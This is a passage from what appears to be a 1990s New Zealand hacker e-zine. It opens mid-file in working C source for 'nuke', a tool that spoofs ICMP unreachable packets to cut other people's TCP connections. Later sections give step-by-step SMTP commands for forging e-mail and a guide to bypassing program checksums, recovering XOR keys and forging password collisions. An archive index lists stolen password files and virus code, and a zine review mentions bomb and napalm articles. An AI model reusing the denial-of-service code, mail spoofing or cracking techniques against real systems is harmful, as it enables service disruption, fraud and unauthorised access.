while( nleft > 1 ) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if( nleft == 1 ) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/*
* add back carry outs from top 16 bits to low 16 bits
*/
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
int icmp_unreach(host,uhost,port,type)
char *host,*uhost;
int type,port;
{
struct sockaddr_in name;
struct sockaddr dest,uspoof;
struct icmp *mp;
struct tcphdr *tp;
struct protoent *proto;
int i,s,rc;
char *buf = (char *) malloc(sizeof(struct icmp)+64);
mp = (struct icmp *) buf;
if (resolve_host(host,&dest) <0) return(-1);
if (resolve_host(uhost,&uspoof) <0) return(-1);
if ((proto = getprotobyname("icmp")) == NULL) {
fputs("unable to determine protocol number of \"icmp\n",stderr);
return(-1);
}
if ((s = socket(AF_INET,SOCK_RAW,proto->p_proto)) <0 ) {
perror("opening raw socket");
return(-1);
}
/* Assign it to a port */
name.sin_family = AF_INET;
name.sin_addr.s_addr = INADDR_ANY;
name.sin_port = htons(port);
/* Bind it to the port */
rc = bind(s, (struct sockaddr *) & name, sizeof(name));
if (rc == -1) {
perror("bind");
return(-1);
}
if ((proto = getprotobyname("tcp")) == NULL) {
fputs("unable to determine protocol number of \"icmp\n",stderr);
return(-1);
}
/* the following messy stuff from Adam Glass (icmpsquish.c) */
bzero(mp,sizeof(struct icmp)+64);
mp->icmp_type = ICMP_UNREACH;
mp->icmp_code = type;
mp->icmp_ip.ip_v = IPVERSION;
mp->icmp_ip.ip_hl = 5;
mp->icmp_ip.ip_len = htons(sizeof(struct ip)+64+20);
mp->icmp_ip.ip_p = IPPROTO_TCP;
mp->icmp_ip.ip_src = ((struct sockaddr_in *) &dest)->sin_addr;
mp->icmp_ip.ip_dst = ((struct sockaddr_in *) &uspoof)->sin_addr;
mp->icmp_ip.ip_ttl = 179;
mp->icmp_cksum = 0;
tp = (struct tcphdr *) ((char *) &mp->icmp_ip+sizeof(struct ip));
tp->th_sport = 23;
tp->th_dport = htons(port);
tp->th_seq = htonl(0x275624F2);
mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64));
if ((i= sendto(s,buf,sizeof(struct icmp)+64, 0,&dest,sizeof(dest))) <0 ) {
perror("sending icmp packet");
return(-1);
}
return(0);
}
void main(argc,argv)
int argc;
char **argv;
{
int i, type;
if ((argc <4) || (argc >5)) {
fprintf(stderr,"usage: nuke host uhost port [unreach_type]\n");
exit(1);
}
if (argc == 4) type = DEFAULT_UNREACH;
else type = resolve_unreach_type(argv[4]);
if ((type <0) ||(type >MAX_ICMP_UNREACH)) {
fputs("invalid unreachable type",stderr);
exit(1);
}
if (icmp_unreach(argv[1],argv[2],atoi(argv[3]),type) <0) exit(1);
exit(0);
}
---------------->8-------------------------------------------------------------
Well, this is the smallest stuff I have, and I'm not gonna BORE you with
kbyte's and kbyte's of source.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Busted for nothing ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Okay, I am being forced to type this by gun-point.. okay, maybe not to that
extreme, but it's pretty damn close! We accept no responsibility for the
writing of this article... Can I say that? No, I guess not.. oh well, I
tried... =)
For months we were receiving hundreds of dollars worth of bills through
Telecom for calls we didn't make. For example, a $300 phone call when I
was on holiday - there wasn't anyone home, so how could someone have had a
conversation if there wasn't anyone home to accept the phone call?
[NOTE: There isn't a pill box located anywhere NEAR my house, so don't go
screaming BEIGE BOXING!! - mind you, I had this weird dream that I had this
cute little pill box with wires sticking out of it which was right outside
of our house. Ohmigod, I think I must be going crazy... ANYway..]
These were directed through NZ-Direct from the US. Strange that. No one
had been over to the states recently and it hadn't stated that it was by
using a calling card, so that option was out. So, that required a monthly
scream at Telco about that, and eventually we stopped getting billed for
such calls (which I doubt even existed anyway).
Okay, now that's just the TIP of the iceburg. How would you like to be "con-
victed" for a "crime" you didn't commit? Well, that's basically what happen-
ed. And it was such a PETTY crime at that. Try VMB hacking!
It all started when we discovered a little VMB and everyone else happened to
find it too. What a coincidence.. *grin* Many of their boxes had the de-
fault passwords still attatched to them *sigh*. It's pathetic the way some
companies leave their systems so open and then blame someone else for "abusing
their system" when all we did was look around. Someone had editted the voice
prompts ['twasn't me, but you know who you are... *grin*] and _I_ ended up
taking the blame... hmm.. Anyway, a few of us ended up being "interrogated"
over this stupid prompt editting and leaving "abusive messages".
Anyway, the outcome was, I ended up being the only person accepting respon-
sibility for the entire incident. That included me having to write two let-
ters. Two copies of one letter - one copy to the guy who owned the VMB and
the other copy to the head of Telco security "for scrutiny" - and another
letter to the head of Wellington Telco security explaining the entire incident.
In the end, it was a waste of time not only for me - having to write two
letters - that didn't count the FIRST letter explaining why I shouldn't have
my phone line disconnected (they sent a letter to me saying that if I didn't
respond within a month, or summink, they'd disconnect it anyway - bunch o'
pricks, huh?).
In my final letter to the head of Wellington Telco Security, I reminded them
of the hundreds of dollars worth of calls I had to complain about each month.
FINALLY, something was actually done about it, and the hundred dollars worth
of calls were credited to my account.
The stupid thing was that I didn't do a thing, and had to put up with all the
crap that they threw at me. I also had my 3-way call cancelled.
In conclusion (they always said you have to include one in essays so I'd bet-
ter get extra practice =) ), I'd just like to say that they're a bunch of
dorks. Oh, and the new telephone account layout really sucks too.
[CyntaxEra Mature Mode: ON] *grin* In my opinon, it was better the way it
was, but that doesn't matter, does it? It's probably cheaper for them to do
it the new way. That would explain it all... =)
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Books 2 Read ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Title Author Stars
=================================================================
The Fools Run ...................... John Camp *****
Complicity ...................... Iain Banks ****
War Day ...................... Strieber & Kunetka *****
Blood Music ...................... Greg Bear ****?
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ The SLi Archive Subject list ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Okay, this is the list of all <well, most of> the file areas in the SLi
archives. It's a direct copy of the "/pub/README.NOW!" file and is up to
date as of the release date.
-sof-
Welcome to the SLi archives!
We hope your stay is, err, umm, "enlightening".
The operator of this system takes no responsibility for how the information
is used, BUT suggests STRONGLY you do NOT try ANYTHING, ANY of the files
describe! Some acts depicted in the files held within this archive describe
illegal or immoral acts. PLEASE use your commonsense when defining right
from wrong.
This archive exists to be a library of information, to show people a dif-
ferent outlook on the world and, in truth, a different outlook on life to
give them the opportunity to delve into the realms of adventure and know-
ledge - NOT to insight or teach people how to break the law.
Directories Sub Directories Description
-----------+-------------------+-------------------------------------------
./ai Artificial Intellegence.
./anarchy Anarchy files, explosives etc. (Likly
not to be here anymore as I'm against
this kinda shit now)
./art Art.
ansi If I find ppl up'ing ANSI, I'll shoot
them.
ascii Better than ANSI, I guess.
vt-xxx VT Animations at present.
./bbs
bbs-adds BBS adverts - numbers etc..
. au
. nz
. other
. uk
usa
. misc
./busts Info on different busts.
./cc Info on creadit/calling cards, ATMs
etc.
./civil Civil liberties
./cons Conferences for H/P people - where when,
what happened and confs to come.
./corewars Files for Core Wars.
./cryptography Encrypting and Decrypting.
./cyber The world of the Cyberpunk.
./eff Information on the Electronic Freedom
Foundation - a US civial rights group.
./faq General Frequently Asked Questions.
./history A MUST to read you HAVE to read these
files they are linked to other direct-
ories all over the SLi archive but they
contain a history of different events in
the H/P world.
./howto How-to Guides to misc computer related
activities.
./incoming Incoming files.
./info These files are also contained in other
places. In this archive but are here be-
cause they should be read and because
in my opinion, they are important.
./internet Internet related files.
irc Internet Relay Chat [IRC] files.
sites Different FTP/TELNET sites.
./misc Just a lot of misc stuff with no real
home.
bible Obviously, the Bible.
./mischp Misc Hack/Phreak files.
cable Files to do with Cable TV/SKY.
lockpick Lock-picking related files.
./music Music related stuff.
lyrics Lyrics for songs etc.
misc Misc music related files.
mods Electronic music - most powerpacked for
Amiga.
vocs PC Sound files.
./nz New Zealand related files!
./passwds Password files for different systems.
Please rename the password file to be
"systemname-dd-mm-yy".
ie.
lamesystem-01-02-95.
./pharm Drug files (also probably going to be
removed for the same reason as
"anarchy")
./phreak Information on the Telephone System.
box Different phreaking "boxes".
cellfone Cellular Fones.
countrycodes Every Area/Country Code in the world.
fone-fraud Misc files on fone-fraud written by
Telco/Schools.
history History of the Telefone
. misc Misc Files.
miscexe Misc Executables.
payfones Payphone related files.
. pbx Private Branch eXchanges [PBXs].
standards Different CCITT/Phone Standards.
. vmb Voice Mail Boxes [VMBs].
./pirate Breaking the (c) protection of S/W.
amiga
crack
coding
. ibm
mac
./police Understand thy opposition
misc Miscellaneous files on the police.
./publications Different files from well-known authors
or organisations.
bruce_sterling Includes The Hacker Crackdown and inside
directories FSF_columns, catscan and
interzone.
david_faber
denning
john_gilmore Includes inside directories
Gilmore_v_NSA and inside that,
Clipper_FOIA and ITAR_FOIA.
john_perry_barlow
kapor
unsorted Miscellaneous unsorted publications.
./security Computer Security, Bug fixes and security.
hole descriptions.
8lgm Unix bugs
cert Computer Emergency Response Co-ordination
Centre.
cert_advisories A LOT of system security holes
clippings Misc clippings from diffrent usenet
sources.
misc Misc info.
. dos. DOS <PC> security files.
novell Novell netware.
tools Misc tools for DOS.
faq Frequently Asked Questions.
mac Misc files for the Macintosh.
misc Misc files on Computer Security.
os2 Files for OS2.
unix Files for UNIX based OS's.
antihacktools Anti-Hacker Tools
hackerssrc Various source for you hackers.
hp Files for hacking the Hewlett-Packard's
HPX000's.
vax Vax/Digital/VMS Security.
x.25. x.25 security holes
./sli Southern Lights inc. File Areas.
articles
interest Files that are related to SLi and are
an intrest to the rest of the H/P world
mags The SLi Mags are stored here.
. warnings READ any files in here!
./strange Weird files that should have no place
to go :)
. occult Stuff on the occult <black magic etc..>
. ufo UFO files.
./system Files for different OS's.
. amiga
asm
. utils
. dos
linux
./txts Like misc really.
./usenet Files/Msgs from usenet.
./virus Virus Creators and virus code. Any anti-
virus people feel free to use this info
to create virus killers.
./words Word files.
./zines Electronic Mags.
. hpa Hacking, Phreaking and Anarchy Mags.
. other Don't fit anywhere.
. weird Very weird.
TOTAL DISK SPACE USED: 79055Kbytes [compressed]
Approximately 200Meg [uncompressed].
As of recent times, we have been updating the system at 1-2 Meg per day.
However, this cannot continue, as we have but 40Meg available disk space
remaining, but if anyone is willing to donate an IDE drive, we will be most
appreciative.
NOTE: The use of the word "removed" is being used as in "access to these
files will be removed from normal access users".
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Fake Mail ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, I dont know WHY this is in here, but just in case your interested
and DIDN'T know how to send fake Internet E-Mail here is a step by step
way to do it.
KEY: ignore []'s
*'s are lines that you type
type "telnet [target.comp] 25" at $prompt.
Trying [target.comp]...
Connected [target.comp].
Escape character is '^]'.
220-[target comp] [Mailer/Version] ready at [date/time]
220 ESMTP spoken here
*helo [where.from.comp]
250 [Target.comp] Hello [where.from.comp] [###.###.###], pleased to meet you
*mail from: [where@ever.you.like]
250 [where@ever.you.like]... Sender ok
*rcpt to: [target@target.comp]
250 [target@Target.comp]... Recipient ok
*data
354 Enter mail, end with "." on a line by itself
*hello
*.
250 DAA28466 Message accepted for delivery
*quit
221 [Target.Comp] closing connection
Connection closed by foreign host.
$
Well there you have it. Nice and easy. If you didnt know it already, I'm
a bit disappointed, but that's what we are here for. To teach YOU.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Elements of Data Deprotection ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Elements of Data Deprotection - by Thorium
Data Deprotection is one of my many hobbies. Others include bomb making,
programming, hacking, shooting, phreaking and appearing in court.
I am by no means an expert in this field, in fact I would regard myself as
a "seasoned ammeter". However, I feel that some tips I have picked up
over the years could help others. For this reason I am writing this file.
HOLD IT! You can't program? Well, this won't be much good to ya. You
might even need to know some assembler on whatever platform you use. I use
Amiga's usually (because they are simply the best personal computer - well
for assembler programmers anyway) so I know a fair bit of 68000 assembler.
It also helps to know a few common opcodes (what the actual text of
assembler language gets turned into, ie machine language) and how to use a
good debugger and disassembler.
So, if you are up to here, you're half way to being a K-RAD ELITE DUDE
anyway. In fact, you can probably do more interesting things that most who
call themselves "K-RAD ELITE DUDE"s - so why are you reading this? That's
right, you thought you might pick up a hint or two in an underground
publication. Ok, I hope you learn something.
First:
What do I mean "Data Deprotection" ???
This is probably not the best name for what I will actually describe, but
it is all I could think of. I mean "getting into data" - but not in the
sense of cryptanalasys and that sort of thing that requires a degree.
Data Deprotection has particular reference to more breaking encryption
algorithms, to getting around or breaking checksums and CRC's, and making
small but crucial changes to programs.
NOTE: Some people would call some uses of these skills "Cracking", and
assume that you go around breaking the protection on games. This is
distinctly possible, but before I go further, I would like to point out my
personal feelings on breaking program protection:
If you "crack" a game and distribute it, you are killing the software
industry. Anyway, you needed an original to crack - which someone had to
buy - so whoever bought it is stupid if they pay for something then let
everyone else have it. Basically, I do crack games and things, but I don't
spread what I do. The main reason for this is that I'm not good enough to
keep up with the "big boys" in Europe who crack the latest game overnight.
If I get hold of an original game, it is usually fairly old anyway, like a
year or two, and even back then they had some pretty tricky protection that
has taken a while to get around (like a few days work). Of course, there
are those dead simple games (try Eye of the Beholder II for a beginners
one). Thing is, everyone has it by the time I have finished with it. So I
don't crack to spread. I hardly crack games at all, since my access to
originals is limited. I crack only for the fun of it. And it is quite
fun to pitch your mind against those of the programmers - kind of like
chess play-by-purchase. Anyway, that's my ideas on cracking games etc. If
you want to, go ahead. It just kills the industry. This is why this
article will deal as little as possible with things that could be used to
crack games. It will deal more with accessing data from programs that you
aren't really 'sposed to access.
So, you have this program. You have made whatever change to it for
whatever reason, an it now comes up "corrupt data" or something along those
lines. Now, all you did was change a "Compare with password" to a "Don't
do anything" - so you know it should be able to work fine.
To see if a checksum is your problem, try running the program in it's
original form from your debugger. Just straight running it. If it still
comes up "error" then your debugger just 'aint good enough, since it is not
totally transparent to the program. It would require a discussion on each
debugger to fix this, and I only know those that I use.
If it ran OK, try placing a breakpoint at the place where you change things
and then running the program. Don't do anything at the breakpoint, just
run the program. If it fails, chances are you have a checksum. If not,
try putting the breakpoints around your place you changed, and after they
break, put them back. If it fails, it's probably some sort of check. If
not, something wierd is happening. The reason behind this is that almost
all debuggers will use breakpoints that actually change the memory that you
place a breakpoint on. So when a program goes to check it's memory, if
there is a breakpoint there, it won't find what it thought it would.
So, your program has a checksum? If not, you will need to do a little more
hacking to find out what's up. It usually 'aint too hard, but beyond the
scope of this text. Well, the next thing to do is FIND the checksum.
This can be done by placing a breakpoint on your place to change. If you
run it and without putting the breakpoint back after it occurs then your
program runs fine, then your check is AFTER the part you altered. If it
fails, then the checksum is BEFORE the part you altered. Pretty simple
really. You can further narrow this down by putting breakpoints at
strategic points throughout the code, and watching what happens when you
have a breakpoint in existence only up to there. You will eventually find
the area of code that does the check.
Once you have found this piece of code, you can figure out what it does.
Chances are your program is in some form of compiled language, so won't be
as easy to read as 100% assembler code, but by tracing through it, you can
usually figure out what's up. The skill is to look for critical points in
the code. THERE WILL (almost) ALWAYS BE A COMPARE after any sort of
checksum, wether it be a simple addition, or a complicated CRC. This
compare will then have a conditional statement - this is the crux of it.
All you do is remove the conditional and cover it with a constant - if it
is supposed to branch if a certain value, make it branch always. If it
branches only if NOT a certain value, make it a do-nothing set of
instructions. Sometimes there will be more than one check of the value, so
you must find all of them.
I feel I may have just skipped a vital idea. We changed the conditional
rather than the compare value because we want all future attempts at this
routine to be correct. This may be easier illustrated in, for example, a
trainer mode for a game. It is better to make UNLIMITED lives by removing
the conditional, than to have 9999999 lives - because you can still die.
Also it is a lot easier to change back to it's original form if you stuff
up, because you only need write down the opcodes, not the constant.
Now you have just gotten around a check in the program. There may be more,
and they may be hidden. So just test your program for full functionality.
Insert your original alteration, and test again. If you still have
problems, try this again. There could be multiple checks, checks on
checks, and all sorts of stuff.
You will notice now that the "difference" between your original program
and the altered one will only be a few key bytes. However it is how these
key bytes are placed that is important.
This is only one skill of many you will pick up as a hacker / cracker, but
one of the most used.
And now to make this entire section useless, I shall tell you how to get
around this type of hacking / cracking when you are on the programming end.
MAKE YOUR CHECK VARIABLES DO SOMETHING. If you calculate the CRC or some
vital code, don't just compare it, use it as a relative pointer into a data
segment. If the CRC is wrong, your system crashes. It's best to not even
COMPARE it, as this means you have the correct value sitting there. Just
assume it is right, and have the checksum or CRC or whatever in your
initialization code, but don't use it till much later on. This way your
hacker will likely give up.
And to make that useless - how to crack programs that use this technique
(gee, get the feeling every crack leads to a fix, and every fix leads to a
crack?). Just debug the program, figure out the correct value for the CRC
or whatever, and hard-code that in! Wipe over the CRC routine with one
that sets any variables it was supposed to correctly. Chances are it will
take up less space anyway!
So, we have done "actually changing a program" from the point of view of
making it run with changes. Now I shall cover (very basically) encryption
and decryption.
Encryption is mostly used to keep things from prying eyes. Which is
exactly what makes me want to break it. A program might have it's
datafiles stored encrypted to stop you getting unfair hints, or it might
have some of it's code encrypted that does some magical copy protection.
Essential to the breaking of codes with reference to programs, is that any
program has all the code necessary to decrypt it's data. PGP has all it's
code there in source form, what could be easier. However, this is where
the first problem starts - the KEY. If you know the key, you really dont
need to be reading this. If you don't know the key, you have to break the
algorithm. This is where it gets hard. PGP is more or less unbreakable,
because it uses a complicated algorithm and a complex and constantly
changing key (different for each person).
However most programs use only 1 key, and that is usually stored within
the program itself. The simplest of routines is that you get all your
data, and logically NOT it, ie all 1's become 0's and all 0's become 1's.
For this simple system, the algorithm IS the key. All you do is reverse
the algorithm, ie run it over again, and out comes your data.
Another logical operator, Exclusive-OR (sometimes refered to as EOR or
XOR), is commonly used. This is easiest thought of as a "selective not" -
where each bit in the "key" (source) says wether each bit in the
destination should be "NOT"'d. If the key bit is a 1, it is. So a key of
1010 and a dest of 1001 would become 0011. This also is also a reversible
algorithm, so all you do is run it over again. EOR has the advantage as a
algorithm with a "key" component. The KEY can be difficult to guess,
especially if it is more than 1 byte. However there are ways to get around
it. First, see if the program uses a fixed key - ie debug / disassemble it
and see. If so, there you have it. A little playing around and you have
your data.
This brings me to the next main point of this article - finding the EOR key
if you don't have one. This is actually really easy - all you need to do
is know some of the data that is after the EOR, and the length of the Key.
The length of the key can usually be determined from the algorithm, if it
is a continuous loop of EOR'ing a byte with some data, the key is a byte.
If it is going through a reference table (and you can't just dig this table
up) then you have to figure out how long it is. You also need to know at
least one keylength of decrypted data.
What you do is rely on the fact that 1010 EOR 1001 = 0011 and also 0011 EOR
1001 = 1010 - in other words, the key acting on the cypher yields the data,
and the data acting on the cypher yields the key! So all you do is write a
small program that gets your data, and eor's it with the cypher, and you
have the key. You can also build a key from some fragments of data by
guessing what the data in between might be - if this is text, it is usually
easy. Now you apply your key to the rest of the data. Simple!
However one problem is that you usually don't know where abouts in the
cypher your data comes from - so the solution is to write a program that
uses the data in every possible position in the cypher to yield every
possible key, and then use that key on every piece of cypher, and see what
comes out. This may take a while, and you need to be able to recognize the
data in it's correct form, easy if it's text, otherwise difficult.
Other common forms of encryption are addition / subtraction of constant or
changing values, rotation of bits (either in byte, word, or larger blocks),
and swapping blocks of data (be they bits, bytes or larger blocks). The
important thing to remember is that the program itself has to be able to
decrypt the data, so with enough care and patience you can find that bit
and copy it. Remember also that there can be more than one level of
encryption, and different sets of algorithms for different blocks of data.
The final thing I wish to deal with is the topic of "One Way Encryption" -
it is used sometimes to create keys for the above checks and decryption.
It is also useful if you can break the algorithm to make an automatic
password generator for encrypted files from a given program...
This situation is actually very common. It is a real pain. However, you
spot an algorithm that creates the key, possible from a password! Now,
somehow a password of any length is "shrunk" or "expanded" to fit a given
key length, and this is used to decrypt the data. This is called "One Way"
encryption, and is commonly used on passwords. The key created has little
bearing to the original password, and can't be recovered because there is
usually a "loss of significance" of data.
The simplest way to explain is to use the simplest one-way algorithm. Just
add all the bytes of a string together, in a byte. This way you are bound
to get overflow, rendering some data lost. However you end up with a byte
to use, and it will be a byte regardless of the length of the password.
So, if you can't get the password back, how do you pass the test? Simple -
you create a "garbageword". This is something that is functionally the
same as the password, but not actually the password. It is gained by
reversing the algorithm given the result.
In this simple algorithm all you do is get your byte key, and subtract as
many "A"'s as possible from it. Say your key was hex $BC (which
incedentially is the byte sum of the letters 'keys'. You can subtract 'A'
(hex $41) from it 2 times, leaving hex $3A, which is ':' which may not be
liked by our algorithm if it only takes text, so we find how much we have
to TAKE OFF it to get a letter or number. The closest number is '9' just
below it, so we use that, and add the extra 1 to one of the 'A's.
Therefore our garbageword is now 'AB9' - this is functionally the same as
'keys' for this algorithm, and so we have broken the lock.
You will hardly ever get an algorithm as simple as this one, but _ANY_ one
way encryption can be made to yeild a garbageword given the key if you
devote enough time to it.
And how do you stop this sort of breaking of your algorithms? Easy - make
it so complex that a hacker will never want to break it. - remember your
algorithm will always yeild the same key with the same input, so you don't
have to understand what you have written, you just need to check that it
makes different keys.
For example, try to break one that rotates a 2-byte key sotrage by the
lowest 4 bits of a letter to the right, then adds the letter, then rotates
left by the upper 4 bits, and EOR's the letter. This is not actually
_THAT_ hard to create a reverse algorithm for, it is just very hard to
create a printable garbageword. And as long as you make your entry of the
password only take printable letters, it will be hard to beat. And you
have a 1 in 65535 chance of fluking it. But by using a slightly more
complicated algorithm and 4 bytes of data, you would have a 1 in 4294967294
chance.
And an even "trickier" one to break is the algorithm in PowerPacker
encrypted executable files. Nico has thought it out well. You type in a
password, and it calcuates a word to compare and tell you if the password
is valid, but uses a totally separate algorithm to generate a longword for
the actual decryption key - so any garbageword you make from the compare
word is only going to have a 1 in 65535 change of being correct... Makes
things a little difficult , eh? And to make it harder the only encrypted
stuff is the actual crunched data - which seems to be crunched differently
than with no password as well, so I can't think of any way, short of formal
cryptanalasys, to get around it.
Well, that's about it from me, bit this is only the tip of the iceberg of
what there is to learn before you are even a half-competent hacker in these
here parts... But they are 3 important things that will lead to much more.
* Data wants to be free - so help it out *
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Review: 'ToT' ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
REVIEW: 'Tricks of the Trade' [ToT]
This is the first review that we will be including in the SLi Magazine, but
we hope to expand to reviewing a few others in the future.
[PLEASE NOTE: This is a critical review. Some have said it has been a little
too critical, perhaps that is the case, but the decision is to
be left to you, the reader.]
[BRIEFING]
WHAT? Electronic Magazine.
WHO? Distributed by: Raider.
Content by : Hype, Red Lion, Mutant-X, GreyRat, Nick,
Demogordon, X-Treme and Kevin.
WHEN? 24th December 1994
WHERE? Written by a group of Wellington H/P/A's. Perhaps a couple
of members out of the Wellington region seeming that at
present I am unable to pin-point the locations and identities
of a couple of the 'ToT' writers.
WHY? This question stumped me for a while as I can only give my
opinion. I came up with the following - a) for the pure
reason to educate others coming up in the H/P/A scene,
b) to give 'SLi' a taste of competition (this could be fun!)
or maybe even, c) to get a bit of the limelight.
These are in order of my suspicions from 'A' being the most
likely, to 'C' being the least likely.
HOW? Thought it was pretty damn obvious, but for those of you who
are interested... They got each of the writers to write their
articles down on paper then gave them to the editor to type out
on his dinky li'l 'puter...
[Editors Note: This seems to be the most TIME wasting story
I've EVER heard BUT that's what they did, so
'Raider' said. ]
[CRITICAL REVIEW]
This magazine isn't too bad for the first couple of issues, but admittably,
the first issue had a little more to be desired.
The idea of there being a variety is 'okay', but that depends on the indi-
viduals of which the magazine was/is designed for.
In my opinion, it appears that 'ToT' is designed with the lesser educated
in the H/P/A scene in mind. There were quite a number of articles in the
second issue of 'ToT' in comparison to any of the 'SLi' issues, but the
articles in 'ToT' were fairly brief and the ideas were a little out-dated.
It appears that 'ToT' is still in the process of deciding where it wants to
go - it would've been a better idea if plans had been made earlier and those
decisions would've made the foundation to start off with. With 'SLi', all
the needy decisions had been made PRIOR to even STARTING the magazine.
'SLi' was a group of companions FAR before it was a magazine - It's ad-
viable to know who's going to be there when you need them and whether they
can be trusted or not. The only way you can find out is by experimentation.
And that's what we did.
Anyway, going back to 'ToT' and it's purpose in the H/P/A scene...
After a good read throughout the magazine, I noticed that there is a fair
deal of information dealing with the Australian telephone network. It may
do a good job there, but WHO are the main people who are most probably
going to make use of the information stored within the bits and bytes?
I may be wrong, but I would say it would be us 'kiwi H/P/A's' who would
benefit most from the information. It looks as though 'ToT' is in too
much of a hurry to be known widespread - 'slow and steady wins the race'
would be a good phrase to put there.
Following is an 'article-by-article review' of 'ToT#2':
[REVIEW]
[Articles One-Three: Clickers]
Clickers. I haven't known of one which has worked yet, but that might just
be that those of whom have used them had not used them correctly. Strange
that they hadn't managed to work for about four people, but I guess you'll
just have to try them out for yourself considering that I haven't tried
them out myself.
At least you'll get your own BBQ lighter... Pretty sure that they'd make a
pretty good shock device - could be used as a stun gun if they're what I
think they are.
[Article Four: Travel Sickness]
The only flaw I could be sure on commenting on, is the lack of information
on what they [the tablets] actually do to the human body and whether or
not they're safe (or at least not lethal).
If ideas like this one are printed without thought to any consequences they
may have, we may find that a lot of people may suffer injuries due to the
lack of information given to the reader. Mind you, if you're silly enough
to try something without attempting to find out about it beforehand, then
you hold as much responsibility as the person responsible for the printing
of the information given.
[Article Five: Busted???]
Well, I guess I have no problems at all with this article. This is an art-
icle providing information to the reader which does not prompt for any
further action.
[Article Six: Credit Card Calling]
I had just recently covered this in the 'SLi#3' before I had any knowledge
of this article at all - it covered basically the same aspects but I'd tried
to explain it a little more to make sure it was understood better, but this
article is nonetheless okay, even if I disagree with some of the hints to a
certain degree. Still, a good article.
[Article Seven: Nut n Bolt Bomb]
It's already well-known that match heads contain explosive chemicals, but
I think that the writer of this article COULD have at least pointed out how
dangerous this can be - what with the flying shrapnel and the explosiveness
of the match head mixture. I was dismayed at the fact that I couldn't spot
a single safety warning right throughout the entire magazine at all.
[Note: This has already been covered in a few other mags prior to this one,
ie. early editions of Phrack among others.]
[Article Eight: Hacking Calling Cardz]
The article was a little vague, but (because of previous experiences with
this scenario) I could see what they were trying to explain. I find that
if you're more polite, you get what you want quicker instead of having to
bumble around with other unnecessary situations - no one likes a pushy
operator, so you can imagine how the victims would feel!
[Article Nine: One for the Neighbourz]
Well... I don't really have a comment on this one - read it for yourself..
I'm kind of, uh, "speachless". =)
[Article Ten: Hot Air Balloon]
A nicely presented article. I don't think I'd bother trying to build one
though considering I'd find it a fire-hazard if put together wrong and the
chances are, I'd do it wrong. Still, worth a try if you're into this sort
of thing and are competent in doing so. =)
[Article Eleven: Hidenburg Balloon]
This is just your basic acid-base explosion when you bring a naked flame
to Hydrogen[?]. A nice little bang, but watch for flying pieces of glass if
there are any - should be careful.
[Article Twelve: Hintz n Tipz for Pot Planting]
A nice little article on (as it says in the title) hints and tips for the
planting of marijuana plants. Not bad.. not bad at all. Even if originally
posted on "Bad Sector BBS" and then (with the writer's permission, of course)
transferred to the magazine - at least it's making use of your resources. =)
[Article Thirteen: How to Pass a Lie Detector Test]
A very entertaining article.. What can I say? I enjoyed reading it.
... But WHERE are you going to have to fake a lie detector test. If you're
foolish enuff to get caught, you can guarantee they have enough on you and
they WONT need you to confirm or deny it. Well, I guess if you're being in-
terrogated about certain activities concerning friends, this could be handy.
Still, a good read - you never know when you might need it.
[Article Fourteen: Just 4 Fun]
Uh, short. Very short in fact. A space filler?
[Article Fifteen: Corn Bombs]
A simple, no nonsense bomb.
[Article Sixteen: Fucking up a BBS]
Old concept. Has been brought up in MANY different places, magazines,
person-to-person chats, etc... Simple commonsense really. Telecom seems
to be tightening up the security of other peoples services - about time
they'd wised up to the old trick!
[Article Seventeen: Hacking CityNet/Genie]
The first part showed potential for something not to laugh at, although,
it was an old trick and many people had already been aware of the fact that
it was something done quite often. But, why bother when you can just walk
in and make your own account? Even one with a fake name. All you need to
do is simply USE YOUR COMMONSENSE. As for the hacking of CityNet/Genie
passwords with the user's names, you can't guarantee that it's going to
work. Is it really worth the trouble? Are you going to bother finding out
EVERY SINGLE USER NAME on the system and sit there trying them all day/night?
I guess you could spend a couple of minutes/hours/days writing a proggy/shell
script to do it for you, but I wouldn't want to tie my phoneline up!
The service is free, so isn't that enough?
[Article Eighteen: Strange Auzzie Numberz]
So, how many people out there, who've read this article, are going to fly,
float, swim, etc... to Australia? This is of no use to you if you're not
planning on visiting them within this half-decade or so. The chances of
any flaws, from today still being around by that time are pretty slim due to
the technology boom that should occur in the next few years. Although, this
is useful if you have friends/associates living in Aussie who you like to
keep in contact with.
[Article Nineteen: Hackerz Hit Telecom]
Yet another article dealing with the land mass north-west of New Zealand.
The article was okay for light reading, but was of little interest to my-
self. Similar to 'Article Five: Busted???' in that it is a "media reported"
incident.
[Article Twenty: 008 Diverter]
Refer to [Article Eighteen: Strange Auzzie Numberz].
[Article Twenty-One: Eureka]
One word: Childish...
Oh, and a couple more:
... next please...
[Article Twenty-Two: Making Napalm]
I highly disliked the example of a cat being used and I have already voiced
my opinion on this to 'Raider'. I'm not too sure whether they [the writers]
realize the effects of their ideas seeming that there are going to be those
